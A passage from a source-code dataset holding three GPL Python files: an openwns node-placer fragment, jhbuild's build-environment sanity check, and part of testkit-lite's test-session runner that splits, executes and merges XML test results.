self.rotate = rotate
def setCenter(self, center):
self.center = center
def getPositions(self):
positions = []
for i in xrange(self.numberOfNodes):
x = self.positionsList[i].x
y = self.positionsList[i].y
v = openwns.geometry.position.Vector(x = x, y = y, z = 0.0)
p = v.turn2D(self.rotate).toPosition()
positions.append(p)
return [p + self.center for p in positions]
def isInside(self, position):
for i in xrange(self.numberOfNodes):
x = self.positionsList[i].x
y = self.positionsList[i].y
v = openwns.geometry.position.Vector(x = x, y = y, z = 0.0)
p = v.turn2D(self.rotate).toPosition()
if p.x + self.center.x == position.x:
return True
return False
|
creasyw/IMTAphy
|
framework/scenarios/PyConfig/scenarios/placer/positionList.py
|
Python
|
gpl-2.0
| 2,880
|
# jhbuild - a build script for GNOME 1.x and 2.x
# Copyright (C) 2001-2006 James Henstridge
#
# sanitycheck.py: check whether build environment is sane
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import sys
import os
import re
from jhbuild.commands import Command, register_command
from jhbuild.utils.cmds import get_output, check_version
from jhbuild.errors import UsageError, CommandError
def get_aclocal_path():
data = get_output(['aclocal', '--print-ac-dir'])
path = [data[:-1]]
env = os.environ.get('ACLOCAL_FLAGS', '').split()
i = 0
while i < len(env):
if env[i] == '-I':
path.append(env[i+1])
i = i + 2
else:
i = i + 1
return path
def inpath(filename, path):
for dir in path:
if os.path.isfile(os.path.join(dir, filename)):
return True
# also check for filename.exe on Windows
if sys.platform.startswith('win') and os.path.isfile(os.path.join(dir, filename + '.exe')):
return True
return False
class cmd_sanitycheck(Command):
doc = N_('Check that required support tools are available')
name = 'sanitycheck'
usage_args = ''
def run(self, config, options, args, help=None):
if args:
raise UsageError(_('no extra arguments expected'))
# check whether the checkout root and install prefix are writable
if not (os.path.isdir(config.checkoutroot) and
os.access(config.checkoutroot, os.R_OK|os.W_OK|os.X_OK)):
uprint(_('checkout root (%s) is not writable') % config.checkoutroot)
if not (os.path.isdir(config.prefix) and
os.access(config.prefix, os.R_OK|os.W_OK|os.X_OK)):
uprint(_('install prefix (%s) is not writable') % config.prefix)
# check whether various tools are installed
if not check_version(['libtoolize', '--version'],
r'libtoolize \([^)]*\) ([\d.]+)', '1.5'):
uprint(_('%s not found') % 'libtool >= 1.5')
if not check_version(['gettext', '--version'],
r'gettext \([^)]*\) ([\d.]+)', '0.10.40'):
uprint(_('%s not found') % 'gettext >= 0.10.40')
if not check_version(['pkg-config', '--version'],
r'^([\d.]+)', '0.14.0'):
uprint(_('%s not found') % 'pkg-config >= 0.14.0')
if not check_version(['autoconf', '--version'],
r'autoconf \([^)]*\) ([\d.]+)', '2.53'):
uprint(_('%s not found') % 'autoconf >= 2.53')
if not check_version(['automake', '--version'],
r'automake \([^)]*\) ([\d.]+)', '1.10'):
uprint(_('%s not found') % 'automake >= 1.10')
try:
not_in_path = []
path = get_aclocal_path()
macros = ['libtool.m4', 'gettext.m4', 'pkg.m4']
for macro in macros:
if not inpath (macro, path):
uprint(_("aclocal can't see %s macros") % (macro.split('.m4')[0]))
if not_in_path.count(macro) == 0:
not_in_path.append(macro)
if len(not_in_path) > 0:
uprint(_("Please copy the lacking macros (%s) in one of the following paths: %s"
% (', '.join(not_in_path), ', '.join(path))))
except CommandError, exc:
uprint(str(exc))
# XML catalog sanity checks
if not os.access('/etc/xml/catalog', os.R_OK):
uprint(_('Could not find XML catalog'))
else:
for (item, name) in [('-//OASIS//DTD DocBook XML V4.1.2//EN',
'DocBook XML DTD V4.1.2'),
('http://docbook.sourceforge.net/release/xsl/current/html/chunk.xsl',
'DocBook XSL Stylesheets')]:
try:
data = get_output(['xmlcatalog', '/etc/xml/catalog', item])
except:
uprint(_('Could not find %s in XML catalog') % name )
# Perl modules used by tools such as intltool:
for perlmod in [ 'XML::Parser' ]:
try:
get_output(['perl', '-M%s' % perlmod, '-e', 'exit'])
except:
uprint(_('Could not find the perl module %s') % perlmod)
# check for cvs:
if not inpath('cvs', os.environ['PATH'].split(os.pathsep)):
uprint(_('%s not found') % 'cvs')
# check for svn:
if not inpath('svn', os.environ['PATH'].split(os.pathsep)):
uprint(_('%s not found') % 'svn')
if not (inpath('curl', os.environ['PATH'].split(os.pathsep)) or
inpath('wget', os.environ['PATH'].split(os.pathsep))):
uprint(_('%s or %s not found') % ('curl', 'wget'))
# check for git:
if not inpath('git', os.environ['PATH'].split(os.pathsep)):
uprint(_('%s not found') % 'git')
else:
try:
git_help = os.popen('git --help', 'r').read()
if not 'clone' in git_help:
uprint(_('Installed git program is not the right git'))
else:
if not check_version(['git', '--version'],
r'git version ([\d.]+)', '1.5.6'):
uprint(_('%s not found') % 'git >= 1.5.6')
except:
uprint(_('Could not check git program'))
# check for flex/bison:
if not inpath('flex', os.environ['PATH'].split(os.pathsep)):
uprint(_('%s not found') % 'flex')
if not inpath('bison', os.environ['PATH'].split(os.pathsep)):
uprint(_('%s not found') % 'bison')
if not inpath('xzcat', os.environ['PATH'].split(os.pathsep)):
uprint(_('%s not found') % 'xzcat')
register_command(cmd_sanitycheck)
|
rpavlik/jhbuild-vrjuggler
|
jhbuild/commands/sanitycheck.py
|
Python
|
gpl-2.0
| 6,633
|
#!/usr/bin/python
#
# Copyright (C) 2012 Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# Authors:
# Zhang, Huihui <huihuix.zhang@intel.com>
# Wendong,Sui <weidongx.sun@intel.com>
# Yuanyuan,Zou <zouyuanx@intel.com>
""" prepare run , split xml ,run case , merge result """
import traceback
import os
import platform
import time
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import traceback
import collections
from datetime import datetime
from shutil import copyfile
import xml.etree.ElementTree as etree
import ConfigParser
from tempfile import mktemp
from shutil import move, rmtree
from os import remove
import copy
from testkitlite.util.log import LOGGER
from testkitlite.util.str2 import str2xmlstr
from testkitlite.util.errors import TestCaseNotFoundException
from testkitlite.util.errors import TestCaseNotFoundException, TestEngineException
from testkitlite.util import tr_utils
from testkitlite.util.result import TestSetResut
import subprocess
import glob
if platform.system().startswith("Linux"):
import fcntl
if platform.system().startswith("Windows"):
import win32con
import win32file
import pywintypes
JOIN = os.path.join
DIRNAME = os.path.dirname
BASENAME = os.path.basename
EXISTS = os.path.exists
ABSPATH = os.path.abspath
# test constants
OPT_LAUNCHER = 'test-launcher'
OPT_EXTENSION = 'test-extension'
OPT_DEBUG_LOG = 'debug-log-base'
OPT_CAPABILITY = 'capability'
OPT_DEBUG = 'debug'
OPT_RERUN = 'rerun'
OPT_WIDGET = 'test-widget'
OPT_STUB = 'stub-name'
OPT_SUITE = 'testsuite-name'
OPT_SET = 'testset-name'
OPT_test_set_src = 'test-set-src'
DEFAULT_TIMEOUT = 90
class TestSession:
"""
Parse the testdefinition.xml files.
Apply filter for each run.
Conduct tests execution.
"""
def __init__(self, connector, worker):
""" init all self parameters here """
# dryrun
self.bdryrun = False
# non_active
self.non_active = False
# result file
self.resultfile = None
# external test
self.external_test = None
# filter rules
self.filter_rules = None
self.debug = False
self.resultfiles = set()
self.core_auto_files = []
self.core_manual_files = []
self.androidunit_test_files = []
self.pyunit_test_files = []
self.nodeunit_test_files = []
self.skip_all_manual = False
self.testsuite_dict = {}
self.webapi_auto_files = []
self.webapi_manual_files = []
self.bdd_test_files = []
self.xcunit_test_files = []
self.iosuiauto_test_files = []
self.testresult_dict = {"pass": 0, "fail": 0,
"block": 0, "not_run": 0}
self.current_test_xml = "none"
self.first_run = True
self.deviceid = None
self.session_id = None
self.set_parameters = {}
self.connector = connector
self.stub_name = "testkit-stub"
self.testworker = worker
self.capabilities = {}
self.has_capability = False
self.rerun = False
self.test_prefix = ""
self.filter_ok = False
#self.wdurl = ""
#self.debugip = ""
self.targetplatform = ""
self.is_webdriver = False
self.system = platform.system()
self.platform = None
def set_global_parameters(self, options):
"get all options "
# apply dryrun
if options.bdryrun:
self.bdryrun = options.bdryrun
# Disable set the result of core manual cases from the console
if options.non_active:
self.non_active = options.non_active
# apply user specify test result file
if options.resultfile:
self.resultfile = options.resultfile
# set the external test
if options.exttest:
self.external_test = options.exttest
if options.debug:
self.debug = options.debug
if options.rerun:
self.rerun = options.rerun
if options.test_prefix:
self.test_prefix = options.test_prefix
if options.worker:
self.worker_name = options.worker
if options.worker == "webdriver":
self.is_webdriver = True
else:
self.worker_name = None
if options.commodule:
self.platform = options.commodule
#if options.targetplatform:
self.targetplatform = os.environ.get("targetplatform",'')
#modify the wdurl value, yangx.zhou@intel.com, 2014.09.18
#if options.wdurl:
# self.wdurl = options.wdurl
#if options.debugip:
# self.debugip = options.debugip
def add_filter_rules(self, **kargs):
"""
kargs: key:values - "":["",]
"""
self.filter_rules = kargs
def set_session_id(self, session_id):
""" set the set test session id which is get form com_module """
self.session_id = session_id
def set_capability(self, capabilities):
""" set capabilitys """
self.capabilities = capabilities
self.has_capability = True
def prepare_run(self, testxmlfile, resultdir=None):
"""
testxmlfile: target testxml file
execdir and resultdir: should be the absolute path since TestSession
is the common lib
"""
# resultdir is set to current directory by default
if not resultdir:
resultdir = os.getcwd()
self.session_dir = resultdir
try:
filename = testxmlfile
filename = os.path.splitext(filename)[0]
os_ver = platform.system()
if os_ver == "Linux" or os_ver == "Darwin":
file_items = filename.split('/')
else:
file_items = filename.split('\\')
if len(file_items) < 2 or file_items[-2] == "" or file_items[-1] == "":
return False
filename = file_items[-2] + '_' + file_items[-1]
if self.filter_rules["execution_type"] == ["manual"]:
resultfile = "%s.manual.xml" % filename
else:
resultfile = "%s.auto.xml" % filename
resultfile = JOIN(resultdir, resultfile)
if not EXISTS(resultdir):
os.mkdir(resultdir)
LOGGER.info("[ analysis test xml file: %s ]" % resultfile)
self.__prepare_result_file(testxmlfile, resultfile)
self.__split_test_xml(resultfile, resultdir)
except IOError as error:
LOGGER.error(error)
return False
return True
def __split_test_xml(self, resultfile, resultdir):
""" split_test_xml into auto and manual"""
setfind = etree.parse(resultfile).getiterator('set')
if setfind:
test_file_name = "%s" % BASENAME(resultfile)
test_file_name = os.path.splitext(test_file_name)[0]
self.__splite_external_test(
resultfile, test_file_name, resultdir)
def __splite_external_test(self, resultfile, test_file_name, resultdir):
"""select external_test"""
testsuite_dict_value_list = []
testsuite_dict_add_flag = 0
filename_diff = 1
parser = etree.parse(resultfile)
for tsuite in parser.getiterator('suite'):
root = etree.Element('test_definition')
suitefilename = os.path.splitext(resultfile)[0]
suitefilename += ".suite_%s.xml" % filename_diff
suitefilename = JOIN(resultdir, suitefilename)
tsuite.tail = "\n"
root.append(tsuite)
try:
with open(suitefilename, 'w') as output:
tree = etree.ElementTree(element=root)
tree.write(output)
self.__split_xml_to_set(suitefilename)
except IOError as error:
LOGGER.error("[ Error: create filtered result file: %s failed,\
error: %s ]" % (suitefilename, error))
def __prepare_result_file(self, testxmlfile, resultfile):
""" write the test_xml content to resultfile"""
try:
parse_tree = etree.parse(testxmlfile)
suiteparent = parse_tree.getroot()
no_test_definition = 1
if parse_tree.getiterator('test_definition'):
no_test_definition = 0
if no_test_definition:
suiteparent = etree.Element('test_definition')
suiteparent.tail = "\n"
for suite in parse_tree.getiterator('suite'):
suite.tail = "\n"
suiteparent.append(suite)
self.apply_filter(suiteparent)
try:
with open(resultfile, 'w') as output:
tree = etree.ElementTree(element=suiteparent)
tree.write(output)
except IOError as error:
LOGGER.error("[ Error: create filtered result file: %s failed,\
error: %s ]" % (resultfile, error))
except IOError as error:
LOGGER.error(error)
return False
def run_case(self, latest_dir):
""" run case """
# case not found
case_ids = self.filter_rules.get('id')
if case_ids and not self.filter_ok:
raise TestCaseNotFoundException('Test case %s not found!' % case_ids)
if not self.worker_name:
not_unit_test_num = len(self.core_auto_files) \
+ len(self.core_manual_files) + len(self.webapi_auto_files) \
+ len(self.webapi_manual_files) + len(self.bdd_test_files)
if not_unit_test_num > 0:
backup = self.external_test
self.external_test = None
self.__run_with_worker(self.core_auto_files)
self.external_test = backup
self.__run_with_worker(self.webapi_auto_files)
self.external_test = None
self.__run_with_worker(self.core_manual_files)
self.external_test = backup
self.__run_with_worker(self.webapi_manual_files)
if self.worker_name == "webdriver":
core_test_num = len(self.core_auto_files) \
+ len(self.core_manual_files)
if core_test_num > 0:
try:
exec "from testkitlite.engines.default import TestWorker"
LOGGER.info("TestWorker is default")
except Exception as error:
raise TestEngineException("default")
else:
self.testworker = TestWorker(self.connector)
test_xml_set_list = []
backup = self.external_test
self.external_test = None
test_xml_set_list.extend(self.core_auto_files)
test_xml_set_list.extend(self.core_manual_files)
self.__run_with_worker(test_xml_set_list)
self.external_test = backup
webapi_test_num = len(self.webapi_auto_files) \
+ len(self.webapi_manual_files)
if webapi_test_num > 0:
try:
exec "from testkitlite.engines.webdriver import TestWorker"
LOGGER.info("TestWorker is webdriver")
except Exception as error:
raise TestEngineException("webdriver")
else:
self.testworker = TestWorker(self.connector)
test_xml_set_list = []
test_xml_set_list.extend(self.webapi_auto_files)
test_xml_set_list.extend(self.webapi_manual_files)
self.__run_with_worker(test_xml_set_list)
if len(self.bdd_test_files) > 0:
LOGGER.info("Test bdd testcase......")
try:
exec "from testkitlite.engines.bdd import TestWorker"
LOGGER.info("TestWorker is bdd")
except Exception as error:
raise TestEngineException("bdd")
else:
self.testworker = TestWorker(self.connector)
self.__run_with_worker(self.bdd_test_files)
if len(self.androidunit_test_files) > 0:
try:
exec "from testkitlite.engines.androidunit import TestWorker"
LOGGER.info("TestWorker is androidunit")
except Exception as error:
raise TestEngineException("androidunit")
else:
self.testworker = TestWorker(self.connector)
self.__run_with_worker(self.androidunit_test_files)
if len(self.pyunit_test_files) > 0:
try:
exec "from testkitlite.engines.pyunit import TestWorker"
LOGGER.info("TestWorker is pyunit")
except Exception as error:
raise TestEngineException("pyunit")
else:
self.testworker = TestWorker(self.connector)
self.__run_with_worker(self.pyunit_test_files)
if len(self.nodeunit_test_files) > 0:
try:
exec "from testkitlite.engines.nodeunit import TestWorker"
LOGGER.info("TestWorker is nodeunit")
except Exception as error:
raise TestEngineException("nodeunit")
else:
self.testworker = TestWorker(self.connector)
self.__run_with_worker(self.nodeunit_test_files)
if len(self.xcunit_test_files) > 0:
try:
exec "from testkitlite.engines.xcunit import TestWorker"
LOGGER.info("TestWorker is xcunit")
except Exception as error:
raise TestEngineException("xcunit")
else:
self.testworker = TestWorker(self.connector)
self.__run_with_worker(self.xcunit_test_files)
if len(self.iosuiauto_test_files) > 0:
try:
exec "from testkitlite.engines.iosuiauto import TestWorker"
LOGGER.info("TestWorker is iosuiauto")
except Exception as error:
raise TestEngineException("iosuiauto")
else:
self.testworker = TestWorker(self.connector)
self.__run_with_worker(self.iosuiauto_test_files)
def __run_with_worker(self, test_xml_set_list):
try:
for test_xml_set in test_xml_set_list:
LOGGER.info("\n[ run set: %s ]" % test_xml_set)
# prepare the test JSON
self.__prepare_external_test_json(test_xml_set)
# init test here
init_status = self.__init_com_module(test_xml_set)
if not init_status:
continue
# send set JSON Data to com_module
u_ret = self.testworker.run_test(
self.session_id, self.set_parameters)
if not u_ret:
continue
while True:
time.sleep(1)
# check the test status ,if the set finished,get
# the set_result,and finalize_test
if self.__check_test_status():
set_result = self.testworker.get_test_result(
self.session_id)
# write_result to set_xml
self.__write_set_result(
test_xml_set, set_result)
# shut down server
self.finalize_test(self.session_id)
break
self.connector.kill_stub()
except IOError as error:
self.testworker.kill_stub()
LOGGER.error(
"[ Error: fail to run webapi test xml, error: %s ]" % error)
def __split_xml_to_set(self, webapi_file):
"""split xml by <set>"""
LOGGER.debug("[ split xml: %s by <set> ]" % webapi_file)
LOGGER.debug("[ this might take some time, please wait ]")
set_number = 1
test_xml_set_list = []
test_xml_temp = etree.parse(webapi_file)
for test_xml_temp_suite in test_xml_temp.getiterator('suite'):
while set_number <= len(test_xml_temp_suite.getiterator('set')):
copy_url = os.path.splitext(webapi_file)[0]
copy_url += "_set_%s.xml" % set_number
copyfile(webapi_file, copy_url)
test_xml_set_list.append(copy_url)
self.resultfiles.add(copy_url)
set_number += 1
time.sleep(3)
set_number -= 1
LOGGER.info("[ total set number is: %s ]" % set_number)
# only keep one set in each xml file and remove empty set
test_xml_set_list_empty = []
core_auto_set_list = []
core_manual_set_list = []
webapi_auto_set_list = []
webapi_manual_set_list = []
androidunit_set_list = []
pyunit_set_list = []
nodeunit_set_list = []
bdd_test_set_list = []
xcunit_set_list = []
iosuiauto_set_list = []
auto_webdriver_flag = self.is_webdriver and webapi_file.split('.')[-3] == 'auto'
if len(test_xml_set_list) > 1:
test_xml_set_list.reverse()
for test_xml_set in test_xml_set_list:
test_xml_set_tmp = etree.parse(test_xml_set)
set_keep_number = 1
for temp_suite in test_xml_set_tmp.getiterator('suite'):
for test_xml_set_temp_set in temp_suite.getiterator('set'):
if set_keep_number != set_number:
temp_suite.remove(test_xml_set_temp_set)
else:
if not test_xml_set_temp_set.getiterator('testcase'):
test_xml_set_list_empty.append(test_xml_set)
else:
set_type = test_xml_set_temp_set.get('type')
if set_type == "script":
if auto_webdriver_flag and test_xml_set_temp_set.get('ui-auto') == "bdd":
bdd_test_set_list.append(test_xml_set)
else:
if self.filter_rules["execution_type"] == ["auto"]:
core_auto_set_list.append(test_xml_set)
else:
core_manual_set_list.append(test_xml_set)
elif set_type == "pyunit":
pyunit_set_list.append(test_xml_set)
elif set_type == "androidunit":
androidunit_set_list.append(test_xml_set)
elif set_type == "nodeunit":
nodeunit_set_list.append(test_xml_set)
elif set_type in ['js', 'ref','wrt', 'qunit']:
if auto_webdriver_flag and test_xml_set_temp_set.get('ui-auto') == "bdd":
bdd_test_set_list.append(test_xml_set)
else:
if self.filter_rules["execution_type"] == ["auto"]:
webapi_auto_set_list.append(test_xml_set)
else:
webapi_manual_set_list.append(test_xml_set)
elif set_type == "xcunit":
xcunit_set_list.append(test_xml_set)
elif set_type == "iosuiauto":
iosuiauto_set_list.append(test_xml_set)
set_keep_number += 1
set_number -= 1
test_xml_set_tmp.write(test_xml_set)
for empty_set in test_xml_set_list_empty:
LOGGER.debug("[ remove empty set: %s ]" % empty_set)
test_xml_set_list.remove(empty_set)
self.resultfiles.discard(empty_set)
core_auto_set_list.reverse()
self.core_auto_files.extend(core_auto_set_list)
core_manual_set_list.reverse()
self.core_manual_files.extend(core_manual_set_list)
webapi_auto_set_list.reverse()
self.webapi_auto_files.extend(webapi_auto_set_list)
webapi_manual_set_list.reverse()
self.webapi_manual_files.extend(webapi_manual_set_list)
bdd_test_set_list.reverse()
self.bdd_test_files.extend(bdd_test_set_list)
androidunit_set_list.reverse()
self.androidunit_test_files.extend(androidunit_set_list)
pyunit_set_list.reverse()
self.pyunit_test_files.extend(pyunit_set_list)
nodeunit_set_list.reverse()
self.nodeunit_test_files.extend(nodeunit_set_list)
xcunit_set_list.reverse()
self.xcunit_test_files.extend(xcunit_set_list)
iosuiauto_set_list.reverse()
self.iosuiauto_test_files.extend(iosuiauto_set_list)
def lock(self, fl):
try:
if self.system.startswith("Linux"):
#if self.system.startswith("Linux"):
fcntl.flock(fl, fcntl.LOCK_EX)
else:
hfile = win32file._get_osfhandle(fl.fileno())
ov = pywintypes.OVERLAPPED()
win32file.LockFileEx(hfile, win32con.LOCKFILE_EXCLUSIVE_LOCK, 0, -0x10000, ov)
except:
print traceback.print_exc()
return False
else:
return True
def release(self, fl):
if self.system.startswith("Linux"):
fcntl.flock(fl, fcntl.LOCK_UN)
elif self.system.startswith("Windows"):
hfile = win32file._get_osfhandle(fl.fileno())
win32file.UnlockFileEx(hfile, 0, -0x10000, pywintypes.OVERLAPPED())
def merge_resultfile(self, start_time, latest_dir):
""" merge_result_file """
mergefile = mktemp(suffix='.xml', prefix='tests.', dir=latest_dir)
mergefile = os.path.splitext(mergefile)[0]
mergefile = os.path.splitext(mergefile)[0]
mergefile = "%s.result" % BASENAME(mergefile)
mergefile = "%s.xml" % mergefile
mergefile = JOIN(latest_dir, mergefile)
end_time = datetime.today().strftime("%Y-%m-%d_%H_%M_%S")
LOGGER.info("\n[ test complete at time: %s ]" % end_time)
LOGGER.debug("[ start merging test result xml files, "\
"this might take some time, please wait ]")
LOGGER.debug("[ merge result files into %s ]" % mergefile)
root = etree.Element('test_definition')
root.tail = "\n"
totals = set()
# merge result files
resultfiles = self.resultfiles
totals = self.__merge_result(resultfiles, totals)
for total in totals:
result_xml = etree.parse(total)
for suite in result_xml.getiterator('suite'):
if suite.getiterator('testcase'):
suite.tail = "\n"
root.append(suite)
# print test summary
self.__print_summary()
# generate actual xml file
LOGGER.info("[ generate result xml: %s ]" % mergefile)
if self.skip_all_manual:
LOGGER.info("[ some results of core manual cases are N/A,"
"please refer to the above result file ]")
LOGGER.info("[ merge complete, write to the result file,"
" this might take some time, please wait ]")
# get useful info for xml
# add environment node
# add summary node
root.insert(0, get_summary(start_time, end_time))
root.insert(0, self.__get_environment())
# add XSL support to testkit-lite
declaration_text = """<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="testresult.xsl"?>\n"""
try:
with open(mergefile, 'w') as output:
output.write(declaration_text)
tree = etree.ElementTree(element=root)
tree.write(output, xml_declaration=False, encoding='utf-8')
except IOError as error:
LOGGER.error(
"[ Error: merge result file failed, error: %s ]" % error)
# change <![CDATA[]]> to <![CDATA[]]>
replace_cdata(mergefile)
# copy result to -o option
self._final_merge(mergefile)
def _final_merge(self, mergefile):
try:
if self.resultfile:
if os.path.splitext(self.resultfile)[-1] == '.xml':
if not EXISTS(self.resultfile):
if not EXISTS(DIRNAME(self.resultfile)):
if len(DIRNAME(self.resultfile)) > 0:
os.makedirs(DIRNAME(self.resultfile))
LOGGER.info("[ copy result xml to output file:"
" %s ]" % self.resultfile)
copyfile(mergefile, self.resultfile)
else:
suite_total = {}
#print 'result file path : ' , self.resultfile
xml_element_tree = etree.parse(self.resultfile).getroot()
for suite in xml_element_tree.getiterator('suite'):
suite_name = suite.get('name').strip()
#print suite_name,'suite_name'
if suite_name:
if suite_name not in suite_total.keys():
suite_total[suite_name] = []
for set in suite.getiterator('set'):
set_name = set.get('name').strip()
if set_name:
suite_total['%s' %suite_name].append(set_name)
if xml_element_tree is not None:
#f = open(self.resultfile, 'w')
while True:
#self.lock(f)
f = open(self.resultfile, 'w')
if self.lock(f):
time.sleep(1)
#pass
root = etree.parse(mergefile).getroot()
for suite in root.getiterator('suite'):
suite_name = suite.get('name').strip()
if suite_name in suite_total.keys():
for set in suite.getiterator('set'):
set_name = set.get('name').strip()
if set_name in suite_total[suite_name]:
# for testcase in set.getiterator('testcase'):
for dest_suite in xml_element_tree.getiterator('suite'):
if cmp(dest_suite.get('name').strip(),suite_name) ==0:
for dest_set in dest_suite.getiterator('set'):
if cmp(dest_set.get('name').strip(),set_name) == 0:
#xml_element_tree.find(suite).find(set).append(testcase)
for testcase in set.getiterator('testcase'):
dest_set.append(testcase)
else:
for dest_suite in xml_element_tree.getiterator('suite'):
if cmp(dest_suite.get('name').strip(),suite_name) ==0:
dest_suite.append(set)
suite_total[suite_name].append(set_name)
else:
xml_element_tree.append(suite)
suite_total[suite_name] = []
for set in suite.getiterator('set'):
if set.get('name'):
suite_total[suite_name].append(set.get('name'))
try:
f.write(etree.tostring(xml_element_tree))
except:
self.release(f)
LOGGER.Warning("[ can not write to result file:" " %s]" %self.resultfile)
break
else:
self.release(f)
f.close()
try:
root = etree.parse(self.resultfile).getroot()
except:
break
else:
self.testresult_dict = {"pass":0 , "fail":0, "block":0, "not_run": 0}
for result_testcase in root.getiterator("testcase"):
if result_testcase.get("result") == "PASS":
self.testresult_dict["pass"] += 1
if result_testcase.get("result") == "FAIL":
self.testresult_dict["fail"] += 1
if result_testcase.get("result") == "BLOCK":
self.testresult_dict["block"] += 1
if result_testcase.get("result").lower() == "NOT_RUN":
self.testresult_dict["not_run"] += 1
self.__print_summary()
break
else:
time.sleep(1)
self.lock(f)
else:
LOGGER.info(
"[ Please specify and xml file for result output,"
" not:%s ]" % self.resultfile)
except IOError as error:
LOGGER.error("[ Error: fail to copy the result file to: %s,"
" please check if you have created its parent directory,"
" error: %s ]" % (self.resultfile, error))
def __merge_result(self, setresultfiles, totals):
""" merge set result to total"""
resultfiles = setresultfiles
for resultfile in resultfiles:
totalfile = os.path.splitext(resultfile)[0]
totalfile = os.path.splitext(totalfile)[0]
totalfile = os.path.splitext(totalfile)[0]
totalfile = "%s.total" % totalfile
totalfile = "%s.xml" % totalfile
total_xml = etree.parse(totalfile)
# LOGGER.info("|--[ merge webapi result file: %s ]" % resultfile)
result_xml = etree.parse(resultfile)
root = result_xml.getroot()
for total_suite in total_xml.getiterator('suite'):
for total_set in total_suite.getiterator('set'):
for result_suite in result_xml.getiterator('suite'):
for result_set in result_suite.getiterator('set'):
# when total xml and result xml have same suite, set
# print result_set.get('type'),'debug',resultfile
self.__merge_result_by_name(
result_set, total_set, result_suite, total_suite)
total_xml.write(totalfile)
totals.add(totalfile)
return totals
def __merge_result_by_name(
self, result_set, total_set, result_suite, total_suite):
''' merge result select by name'''
if result_set.get('name') == total_set.get('name') \
and result_suite.get('name') == total_suite.get('name'):
if result_set.get('set_debug_msg'):
total_set.set("set_debug_msg", result_set.get('set_debug_msg'))
result_case_iterator = result_set.getiterator(
'testcase')
if result_case_iterator:
for result_case in result_case_iterator:
try:
self.__count_result(result_case)
total_set.append(result_case)
except IOError as error:
LOGGER.error("[ Error: fail to append %s, error: %s ]"
% (result_case.get('id'), error))
def __count_result(self, result_case):
""" record the pass,failed,block,N/A case number"""
if not result_case.get('result'):
result_case.set('result', 'N/A')
# add empty result node structure for N/A case
resinfo_elm = etree.Element('result_info')
res_elm = etree.Element('actual_result')
start_elm = etree.Element('start')
end_elm = etree.Element('end')
stdout_elm = etree.Element('stdout')
stderr_elm = etree.Element('stderr')
resinfo_elm.append(res_elm)
resinfo_elm.append(start_elm)
resinfo_elm.append(end_elm)
resinfo_elm.append(stdout_elm)
resinfo_elm.append(stderr_elm)
result_case.append(resinfo_elm)
res_elm.text = 'N/A'
if result_case.get('result') == "PASS":
self.testresult_dict["pass"] += 1
if result_case.get('result') == "FAIL":
self.testresult_dict["fail"] += 1
if result_case.get('result') == "BLOCK":
self.testresult_dict["block"] += 1
if result_case.get('result') == "N/A":
self.testresult_dict["not_run"] += 1
if result_case.get('result') == "TIMEOUT":
self.testresult_dict["not_run"] += 1
def __get_environment(self):
""" get environment """
device_info = self.connector.get_device_info()
build_infos = self.connector.get_buildinfo()
# add environment node
environment = etree.Element('environment')
environment.attrib['device_id'] = device_info["device_id"]
environment.attrib['device_model'] = device_info["device_model"]
environment.attrib['device_name'] = device_info["device_name"]
environment.attrib['host'] = platform.platform()
environment.attrib['lite_version'] = get_version_info()
environment.attrib['resolution'] = device_info["resolution"]
environment.attrib['screen_size'] = device_info["screen_size"]
environment.attrib['build_id'] = build_infos['buildid']
environment.attrib['device_model'] = build_infos['model']
environment.attrib['manufacturer'] = build_infos['manufacturer']
other = etree.Element('other')
other.text = ""
environment.append(other)
environment.tail = "\n"
return environment
def __print_summary(self):
""" print test summary infomation"""
LOGGER.info("[ test summary ]")
total_case_number = int(self.testresult_dict["pass"]) \
+ int(self.testresult_dict["fail"]) \
+ int(self.testresult_dict["block"]) \
+ int(self.testresult_dict["not_run"])
LOGGER.info(" [ total case number: %s ]" % (total_case_number))
if total_case_number == 0:
LOGGER.info("[Warning: found 0 case from the result files, "
"if it's not right, please check the test xml files, "
"or the filter values ]")
else:
LOGGER.info(" [ pass rate: %.2f%% ]" % (float(
self.testresult_dict["pass"]) * 100 / int(total_case_number)))
LOGGER.info(" [ PASS case number: %s ]" %
self.testresult_dict["pass"])
LOGGER.info(" [ FAIL case number: %s ]" %
self.testresult_dict["fail"])
LOGGER.info(" [ BLOCK case number: %s ]" %
self.testresult_dict["block"])
LOGGER.info(" [ N/A case number: %s ]" %
self.testresult_dict["not_run"])
def __prepare_external_test_json(self, resultfile):
"""Run external test"""
parameters = {}
xml_set_tmp = resultfile
# split set_xml by <case> get case parameters
LOGGER.debug("[ split xml: %s by <case> ]" % xml_set_tmp)
LOGGER.debug("[ this might take some time, please wait ]")
try:
parse_tree = etree.parse(xml_set_tmp)
root_em = parse_tree.getroot()
tsuite = root_em.getiterator('suite')[0]
case_tmp = []
parameters.setdefault("suite_name", tsuite.get('name'))
parameters.setdefault("extension", None)
for tset in root_em.getiterator('set'):
case_order = 1
parameters.setdefault("casecount", str(len(tset.getiterator('testcase'))))
parameters.setdefault("current_set_name", xml_set_tmp)
parameters.setdefault("name", tset.get('name'))
parameters.setdefault("type", tset.get('type'))
parameters.setdefault("exetype", '')
parameters.setdefault("ui_auto_type", '')
parameters["extension"] = tset.get('extension')
if tset.get("ui-auto") is not None:
parameters["ui_auto_type"] = tset.get("ui-auto")
#add test set location, yangx.zhou@intel.com
parameters.setdefault("location", '')
if tset.get("location") is not None:
parameters["location"] = tset.get("location")
# if tset.get("test_set_src") is not None:
# set_entry = self.test_prefix + tset.get("test_set_src")
# parameters.setdefault("test_set_src", set_entry)
for tcase in tset.getiterator('testcase'):
case_detail_tmp = {}
step_tmp = []
